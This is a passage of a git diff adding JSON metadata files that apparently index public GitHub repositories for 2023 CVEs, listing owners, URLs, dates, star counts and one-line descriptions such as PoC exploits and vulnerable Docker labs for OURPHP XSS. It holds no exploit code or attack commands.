+ "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "poc", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30185.json b/2023/CVE-2023-30185.json new file mode 100644 index 0000000000..e1fa811cee --- /dev/null +++ b/2023/CVE-2023-30185.json @@ -0,0 +1,33 @@ +[ + { + "id": 636590324, + "name": "CVE-2023-30185", + "full_name": "c7w1n\/CVE-2023-30185", + "owner": { + "login": "c7w1n", + "id": 92280784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92280784?v=4", + "html_url": "https:\/\/github.com\/c7w1n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c7w1n\/CVE-2023-30185", + "description": null, + "fork": false, + "created_at": "2023-05-05T07:39:31Z", + "updated_at": "2023-05-05T07:39:31Z", + "pushed_at": "2023-05-08T19:23:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30190.json b/2023/CVE-2023-30190.json new file mode 100644 index 0000000000..f77c1fba55 --- /dev/null +++ b/2023/CVE-2023-30190.json @@ -0,0 +1,33 @@ +[ + { + "id": 714643620, + "name": "CVE-2023-30190-FOLLINA", + "full_name": "MojithaR\/CVE-2023-30190-FOLLINA", + "owner": { + "login": "MojithaR", + "id": 127576267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127576267?v=4", + "html_url": "https:\/\/github.com\/MojithaR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MojithaR\/CVE-2023-30190-FOLLINA", + "description": null, + "fork": false, + "created_at": "2023-11-05T13:36:07Z", + "updated_at": "2024-08-23T04:10:49Z", + "pushed_at": "2023-11-19T12:49:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30212.json b/2023/CVE-2023-30212.json new file mode 100644 index 0000000000..b7949f2fa8 --- /dev/null +++ b/2023/CVE-2023-30212.json @@ -0,0 +1,498 @@ +[ + { + "id": 645399898, + "name": "CVE-2023-30212-LAB", + "full_name": "kuttappu123\/CVE-2023-30212-LAB", + "owner": { + "login": "kuttappu123", + "id": 102424737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102424737?v=4", + "html_url": "https:\/\/github.com\/kuttappu123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kuttappu123\/CVE-2023-30212-LAB", + "description": null, + "fork": false, + "created_at": "2023-05-25T15:04:34Z", + "updated_at": "2024-01-27T16:21:39Z", + "pushed_at": "2023-05-26T16:27:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645430158, + "name": "CVE-2023-30212-POC-DOCKER-FILE", + "full_name": "Rishipatidar\/CVE-2023-30212-POC-DOCKER-FILE", + "owner": { + "login": "Rishipatidar", + "id": 53944784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53944784?v=4", + "html_url": "https:\/\/github.com\/Rishipatidar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rishipatidar\/CVE-2023-30212-POC-DOCKER-FILE", + "description": "This repository provides a Docker container for simulating the CVE-2023-30212 vulnerability, allowing you to practice and understand its impact. It includes a comprehensive guide to help you set up the container on your own computer. The documentation for the Docker creation process is also included.", + "fork": false, + "created_at": "2023-05-25T16:23:47Z", + "updated_at": "2023-05-25T18:50:08Z", + "pushed_at": "2023-05-25T18:28:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645721252, + "name": "CVE-2023-30212-Lab", + "full_name": "mallutrojan\/CVE-2023-30212-Lab", + "owner": { + "login": "mallutrojan", + "id": 71654039, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71654039?v=4", + "html_url": "https:\/\/github.com\/mallutrojan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mallutrojan\/CVE-2023-30212-Lab", + "description": "GitHub repository with Dockerfile and files to create a vulnerable environment for CVE-2023-30212, enabling exploration of the exploitability of this security vulnerability. Ideal for research and security enthusiasts to study and understand the impact of the vulnerability in a controlled setting.", + "fork": false, + "created_at": "2023-05-26T09:33:23Z", + "updated_at": "2023-05-27T06:47:07Z", + "pushed_at": "2023-05-27T06:58:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645938533, + "name": "CVE-2023-30212_lab", + "full_name": "Anandhu990\/CVE-2023-30212_lab", + "owner": { + "login": "Anandhu990", + "id": 134521477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134521477?v=4", + "html_url": "https:\/\/github.com\/Anandhu990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anandhu990\/CVE-2023-30212_lab", + "description": null, + "fork": false, + "created_at": "2023-05-26T20:04:17Z", + "updated_at": "2023-05-26T20:04:18Z", + "pushed_at": "2023-05-26T20:18:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646030973, + "name": "CVE-2023-30212", + "full_name": "libas7994\/CVE-2023-30212", + "owner": { + "login": "libas7994", + "id": 134738008, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134738008?v=4", + "html_url": "https:\/\/github.com\/libas7994", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libas7994\/CVE-2023-30212", + "description": "Docker environment and exploit the CVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0 .This vulnerability allows for Cross-Site Scripting (XSS) attacks", + "fork": false, + "created_at": "2023-05-27T04:24:12Z", + "updated_at": "2023-05-27T04:24:13Z", + "pushed_at": "2023-05-27T04:24:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646036513, + "name": "Vulnerable-Docker-Environment-CVE-2023-30212", + "full_name": "libasmon\/Vulnerable-Docker-Environment-CVE-2023-30212", + "owner": { + "login": "libasmon", + "id": 134760409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134760409?v=4", + "html_url": "https:\/\/github.com\/libasmon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libasmon\/Vulnerable-Docker-Environment-CVE-2023-30212", + "description": "Docker environment and exploit the CVE-2023-30212 vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks", + "fork": false, + "created_at": "2023-05-27T04:53:28Z", + "updated_at": "2023-05-27T04:53:28Z", + "pushed_at": "2023-05-27T04:53:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646039109, + "name": "-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212", + "full_name": "libasmon\/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212", + "owner": { + "login": "libasmon", + "id": 134760409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134760409?v=4", + "html_url": "https:\/\/github.com\/libasmon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libasmon\/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212", + "description": "Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks", + "fork": false, + "created_at": "2023-05-27T05:06:17Z", + "updated_at": "2023-05-27T05:06:17Z", + "pushed_at": "2023-05-27T06:38:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646059947, + "name": "Exploite-CVE-2023-30212-Vulnerability", + "full_name": "libasmon\/Exploite-CVE-2023-30212-Vulnerability", + "owner": { + "login": "libasmon", + "id": 134760409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134760409?v=4", + "html_url": "https:\/\/github.com\/libasmon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libasmon\/Exploite-CVE-2023-30212-Vulnerability", + "description": "Docker environment and exploit the CVE-2023-30212 vulnerabilityVE-2023-30212 is a security vulnerability that affects versions of OURPHP prior to or equal to 7.2.0. This vulnerability allows for Cross-Site Scripting (XSS) attacks", + "fork": false, + "created_at": "2023-05-27T06:43:44Z", + "updated_at": "2024-08-12T20:31:30Z", + "pushed_at": "2023-05-27T11:18:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646099095, + "name": "Exploit-the-CVE-2023-30212-vulnerability", + "full_name": "libas7994\/Exploit-the-CVE-2023-30212-vulnerability", + "owner": { + "login": "libas7994", + "id": 134738008, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134738008?v=4", + "html_url": "https:\/\/github.com\/libas7994", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libas7994\/Exploit-the-CVE-2023-30212-vulnerability", + "description": "Vulnerable Docker Environment CVE-2023-30212", + "fork": false, + "created_at": "2023-05-27T09:29:41Z", + "updated_at": "2023-05-27T09:29:42Z", + "pushed_at": "2023-05-27T09:29:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646104862, + "name": "Exploite-CVE-2023-30212-vulnerability", + "full_name": "libasv\/Exploite-CVE-2023-30212-vulnerability", + "owner": { + "login": "libasv", + "id": 134776195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134776195?v=4", + "html_url": "https:\/\/github.com\/libasv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/libasv\/Exploite-CVE-2023-30212-vulnerability", + "description": "Exploit-the-CVE-2023-30212-vulnerability", + "fork": false, + "created_at": "2023-05-27T09:52:54Z", + "updated_at": "2023-05-27T11:39:15Z", + "pushed_at": "2023-05-27T11:34:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646738492, + "name": "CVE-2023-30212", + "full_name": "kai-iszz\/CVE-2023-30212", + "owner": { + "login": "kai-iszz", + "id": 134775469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134775469?v=4", + "html_url": "https:\/\/github.com\/kai-iszz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kai-iszz\/CVE-2023-30212", + "description": null, + "fork": false, + "created_at": "2023-05-29T08:23:34Z", + "updated_at": "2023-05-29T08:23:35Z", + "pushed_at": "2023-05-29T08:41:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 655408234, + "name": "CVE-2023-30212-OURPHP-Vulnerability", + "full_name": "MaThEw-ViNcEnT\/CVE-2023-30212-OURPHP-Vulnerability", + "owner": { + "login": "MaThEw-ViNcEnT", + "id": 86392543, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86392543?v=4", + "html_url": "https:\/\/github.com\/MaThEw-ViNcEnT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaThEw-ViNcEnT\/CVE-2023-30212-OURPHP-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-06-18T19:56:09Z", + "updated_at": "2023-06-18T19:56:10Z", + "pushed_at": "2023-06-19T17:52:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 655807329, + "name": "CVE-2023-30212-POC", + "full_name": "arunsnap\/CVE-2023-30212-POC", + "owner": { + "login": "arunsnap", + "id": 106102148, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106102148?v=4", + "html_url": "https:\/\/github.com\/arunsnap", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arunsnap\/CVE-2023-30212-POC", + "description": null, + "fork": false, + "created_at": "2023-06-19T16:30:05Z", + "updated_at": "2023-06-19T16:30:06Z", + "pushed_at": "2023-06-20T18:33:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656103481, + "name": "Vulnerable-Docker--CVE-2023-30212-", + "full_name": "VisDev23\/Vulnerable-Docker--CVE-2023-30212-", + "owner": { + "login": "VisDev23", + "id": 110278049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110278049?v=4", + "html_url": "https:\/\/github.com\/VisDev23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VisDev23\/Vulnerable-Docker--CVE-2023-30212-", + "description": "This contains the necessary files and Docker to replicate A vulnerability in OURPHP that has a XSS Vulnerability (CVE-2023-30212)", + "fork": false, + "created_at": "2023-06-20T09:08:38Z", + "updated_at": "2024-04-13T07:20:35Z", + "pushed_at": "2023-06-21T06:16:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656147934, + "name": "CVE-2023-30212", + "full_name": "AAsh035\/CVE-2023-30212", + "owner": { + "login": "AAsh035", + "id": 136836668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136836668?v=4", + "html_url": "https:\/\/github.com\/AAsh035", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AAsh035\/CVE-2023-30212", + "description": null, + "fork": false, + "created_at": "2023-06-20T10:50:30Z", + "updated_at": "2023-06-20T11:17:35Z", + "pushed_at": "2023-06-21T04:48:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656182607, + "name": "Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-", + "full_name": "JasaluRah\/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-", + "owner": { + "login": "JasaluRah", + "id": 136897118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136897118?v=4", + "html_url": "https:\/\/github.com\/JasaluRah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JasaluRah\/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-", + "description": null, + "fork": false, + "created_at": "2023-06-20T12:20:20Z", + "updated_at": "2023-06-20T13:01:30Z", + "pushed_at": "2023-06-20T13:37:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30226.json b/2023/CVE-2023-30226.json new file mode 100644 index 0000000000..9c2d56ff5e --- /dev/null +++ b/2023/CVE-2023-30226.json @@ -0,0 +1,33 @@ +[ + { + "id": 664045595, + "name": "CVE-2023-30226", + "full_name": "ifyGecko\/CVE-2023-30226", + "owner": { + "login": "ifyGecko", + "id": 26214995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26214995?v=4", + "html_url": "https:\/\/github.com\/ifyGecko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifyGecko\/CVE-2023-30226", + "description": "rizin denial of service bug", + "fork": false, + "created_at": "2023-07-08T19:14:30Z", + "updated_at": "2023-07-08T20:21:55Z", + "pushed_at": "2023-07-08T20:20:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-30253.json b/2023/CVE-2023-30253.json new file mode 100644 index 0000000000..d3d7e53066 --- /dev/null +++ b/2023/CVE-2023-30253.json @@ -0,0 +1,223 @@ +[ + { + "id": 806179763, + "name": "cve-2023-30253", + "full_name": "Rubikcuv5\/cve-2023-30253", + "owner": { + "login": "Rubikcuv5", + "id": 47946047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47946047?v=4", + "html_url": "https:\/\/github.com\/Rubikcuv5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubikcuv5\/cve-2023-30253", + "description": "Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: v1.0.144 allows directory traversal in the website component", + "fork": false, + "created_at": "2023-08-14T06:18:48Z", + "updated_at": "2024-10-30T16:06:29Z", + "pushed_at": "2024-10-30T16:06:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40361.json b/2023/CVE-2023-40361.json new file mode 100644 index 0000000000..e0d667ad6f --- /dev/null +++ b/2023/CVE-2023-40361.json @@ -0,0 +1,33 @@ +[ + { + "id": 705558213, + "name": "CVE-2023-40361", + "full_name": "vianic\/CVE-2023-40361", + "owner": { + "login": "vianic", + "id": 61748137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61748137?v=4", + "html_url": "https:\/\/github.com\/vianic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vianic\/CVE-2023-40361", + "description": "Security Vulnerability - SECUDOS Qiata", + "fork": false, + "created_at": "2023-10-16T08:49:25Z", + "updated_at": "2023-10-16T08:49:25Z", + "pushed_at": "2023-10-16T10:38:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40362.json b/2023/CVE-2023-40362.json new file mode 100644 index 0000000000..7daa62d2f3 --- /dev/null +++ b/2023/CVE-2023-40362.json @@ -0,0 +1,33 @@ +[ + { + "id": 683251677, + "name": "CVE-2023-40362", + "full_name": "ally-petitt\/CVE-2023-40362", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2023-40362", + "description": "CVE-2023-40362 Vulnerabilitiy details and proof of concept", + "fork": false, + "created_at": "2023-08-26T01:35:43Z", + "updated_at": "2023-12-26T17:07:13Z", + "pushed_at": "2023-12-25T02:40:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40404.json b/2023/CVE-2023-40404.json new file mode 100644 index 0000000000..322ef30048 --- /dev/null +++ b/2023/CVE-2023-40404.json @@ -0,0 +1,50 @@ +[ + { + "id": 865477756, + "name": "GenEtherExploit", + "full_name": "geniuszlyy\/GenEtherExploit", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/GenEtherExploit", + "description": "is a PoC exploit for the macOS vulnerability CVE-2023-40404. This PoC leverages IOKit APIs to interact with the IOUserEthernetResource network service, manipulating the system's network interfaces", + "fork": false, + "created_at": "2024-09-30T15:41:14Z", + "updated_at": "2024-10-06T16:40:51Z", + "pushed_at": "2024-09-30T15:42:32Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blockchain-security", + "cve", + "cve-2023-40404", + "cybersecurity", + "ethernet", + "ethical-hacking", + "exploit", + "genetherexploit", + "iokit", + "iouser", + "penetration-testing", + "poc", + "security", + "smart-contracts", + "vulnerability", + "web3" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40429.json b/2023/CVE-2023-40429.json new file mode 100644 index 0000000000..69f1794df7 --- /dev/null +++ b/2023/CVE-2023-40429.json @@ -0,0 +1,33 @@ +[ + { + "id": 702720524, + "name": "cve-2023-40429-ez-device-name", + "full_name": "biscuitehh\/cve-2023-40429-ez-device-name", + "owner": { + "login": "biscuitehh", + "id": 507442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/507442?v=4", + "html_url": "https:\/\/github.com\/biscuitehh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/biscuitehh\/cve-2023-40429-ez-device-name", + "description": "CVE-2023-40429: An app may be able to access sensitive user data.", + "fork": false, + "created_at": "2023-10-09T21:52:56Z", + "updated_at": "2024-04-14T18:03:42Z", + "pushed_at": "2023-10-09T22:21:04Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40459.json b/2023/CVE-2023-40459.json new file mode 100644 index 0000000000..95188aeba6 --- /dev/null +++ b/2023/CVE-2023-40459.json @@ -0,0 +1,64 @@ +[ + { + "id": 750832697, + "name": "CVE-2023-40459", + "full_name": "majidmc2\/CVE-2023-40459", + "owner": { + "login": "majidmc2", + "id": 33040588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33040588?v=4", + "html_url": "https:\/\/github.com\/majidmc2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/majidmc2\/CVE-2023-40459", + "description": "PoC of CVE-2023-40459 (DoS on ACEmanager)", + "fork": false, + "created_at": "2024-01-31T12:11:34Z", + "updated_at": "2024-02-08T15:59:49Z", + "pushed_at": "2024-02-03T07:33:20Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 860972880, + "name": "CVE-2023-40459", + "full_name": "7h3w4lk3r\/CVE-2023-40459", + "owner": { + "login": "7h3w4lk3r", + "id": 61451071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61451071?v=4", + "html_url": "https:\/\/github.com\/7h3w4lk3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7h3w4lk3r\/CVE-2023-40459", + "description": "CVE-2023-40459 Unauthenticated DoS PoC Exploit ", + "fork": false, + "created_at": "2024-09-21T16:53:59Z", + "updated_at": "2024-11-21T08:24:47Z", + "pushed_at": "2024-11-21T08:24:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40477.json b/2023/CVE-2023-40477.json new file mode 100644 index 0000000000..b8146da62e --- /dev/null +++ b/2023/CVE-2023-40477.json @@ -0,0 +1,64 @@ +[ + { + "id": 684635082, + "name": "Scan_WinRAR", + "full_name": "winkler-winsen\/Scan_WinRAR", + "owner": { + "login": "winkler-winsen", + "id": 43114182, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43114182?v=4", + "html_url": "https:\/\/github.com\/winkler-winsen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/winkler-winsen\/Scan_WinRAR", + "description": "Scan for WinRAR files affected to CVE-2023-40477", + "fork": false, + "created_at": "2023-08-29T14:41:58Z", + "updated_at": "2023-08-29T14:44:09Z", + "pushed_at": "2023-08-29T14:44:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 684680824, + "name": "Winrar-CVE-2023-40477-POC", + "full_name": "wildptr-io\/Winrar-CVE-2023-40477-POC", + "owner": { + "login": "wildptr-io", + "id": 130668432, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130668432?v=4", + "html_url": "https:\/\/github.com\/wildptr-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wildptr-io\/Winrar-CVE-2023-40477-POC", + "description": "CVE-2023-40477 PoC by Wild-Pointer", + "fork": false, + "created_at": "2023-08-29T16:29:48Z", + "updated_at": "2024-07-30T16:14:48Z", + "pushed_at": "2023-08-30T14:34:32Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 25, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40600.json b/2023/CVE-2023-40600.json new file mode 100644 index 0000000000..8c6434f40d --- /dev/null +++ b/2023/CVE-2023-40600.json @@ -0,0 +1,33 @@ +[ + { + "id": 721296341, + "name": "CVE-2023-40600", + "full_name": "RandomRobbieBF\/CVE-2023-40600", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-40600", + "description": "EWWW Image Optimizer <= 7.2.0 - Unauthenticated Sensitive Information Exposure via Debug Log", + "fork": false, + "created_at": "2023-11-20T19:05:50Z", + "updated_at": "2023-11-20T19:05:51Z", + "pushed_at": "2023-11-20T19:06:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-40626.json b/2023/CVE-2023-40626.json new file mode 100644 index 0000000000..f685f7b900 --- /dev/null +++ b/2023/CVE-2023-40626.json @@ -0,0 +1,39 @@ +[ + { + "id": 725270431, + "name": 